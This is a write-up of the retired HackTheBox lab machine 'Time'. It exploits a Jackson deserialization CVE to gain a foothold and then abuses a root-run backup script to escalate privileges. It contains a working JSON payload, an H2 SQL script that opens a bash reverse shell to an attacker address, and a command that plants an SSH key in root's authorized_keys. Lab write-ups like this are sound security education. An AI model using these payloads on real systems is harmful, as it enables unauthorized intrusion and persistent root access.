Hackthebox - Time

Summary

Time,a Linux box created by HackTheBox user egotisticalSW & felamos was a medium difficulty box. Initial foothold was finding an exploiting a CVE in fasterxml.jackson and using that we get a shell as pericles which was the user of the box, and we can grab user.txt. Running Linpeas we find timer_backup.sh editing that we can get code-execution as root.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.80 scan initiated Sun Oct 25 11:33:50 2020 as: nmap -sC -sV -oN nmap/time 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 25 11:34:02 2020 -- 1 IP address (1 host up) scanned in 11.75 seconds

Web (80)

Viewing the page we see that it is a JSON Beautifier and Validator

Trying Validation we get

1
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

So we know this is fasterxml.jackson, Googling around we find a CVE-2019-12384 and a POC

So I created an inject.sql

1
2
3
4
5
6
7
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.X/4444 0>&1')

and sent this as a payload

1
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.x:8000/inject.sql'"}]

and we get a shell as

and we can grab user.txt

Privilege Escalation

Running linpeas.sh we find something interesting

1
/usr/bin/timer_backup.sh

So I edited the timer_backup.sh to give a reverse shell but that was not getting me a stable shell. to get a proper stable shell as soon as i got a shell. I ran

1
echo "ssh-rsa <public-key>" > /root/.ssh/authorized_keys

to write a a public key in server authorized_keys and used the private key to get a ssh session as root and grabbed root.txt

and we have pwned Time 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/time/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.